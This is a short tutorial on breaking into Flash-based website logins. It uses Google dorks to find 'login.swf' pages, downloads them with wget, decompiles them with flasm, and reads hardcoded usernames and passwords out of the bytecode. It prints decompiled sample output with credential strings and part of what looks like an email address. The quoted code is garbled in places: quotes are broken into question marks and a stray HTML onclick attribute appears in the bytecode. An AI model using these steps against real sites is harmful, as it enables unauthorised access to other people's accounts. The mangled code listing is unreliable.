2 Decompiling Flash Logins

This Tutorial will show you how to bypass unsecured flash logins it is a pretty simple task you can do this by first searching google for some flash logins i like to use either login.swf or inurl:login.swf now you have found a site you would like to bypass simply change the link at the top from login.html to login.swf you will see that it has zoomed in the login table all you need to do is download the login.swf by simply opening a shell & typing

wget http://whatever.com/login.swf/

You will now see it has downloaded the flash login to you root shell. its now time to decompile the login you can do this by typing

flasm -d login.swf

Now you will see it looks a bit like below.

movie ‘login.swf’ // flash 5, total frames: 3, frame rate: 10 fps, 170×109 px

protect

defineButton 20

on overUpToOverDown

push ‘V’

push ‘0?

push ‘1?

push ‘String’

new

setVariable

push ‘z’

push ”

push ‘1?

push ‘String’

new

setVariable

push ‘z’

push ‘userBox’

getVariable

push ‘passBox’

getVariable

concat

setVariable

push ‘z’

getVariable

push ‘Kaj20code20fm’

stringEq

not

branchIfTrue label1

push ‘V’

push ‘1?

setVariable

getURL ‘http://www.example.com/frontpage.html’ ‘_self’

label1:

push ‘z’

getVariable

push ‘Overkaj12345?

stringEq

not

branchIfTrue label2

push ‘V’

push ‘1?

setVariable

getURL ‘http://www.example.com/frontpage.html’ ‘_self’

label2:

push ‘z’

getVariable

push ‘tte@fujitsu.dk” onclick=”window.open(this.href);return false20code20fm’

stringEq

not

branchIfTrue label3

push ‘V’

push ‘1?

As you can see from looking in the code it says push ‘Overkaj12345? you will ned to split this into two parts Username Overkaj Password: 12345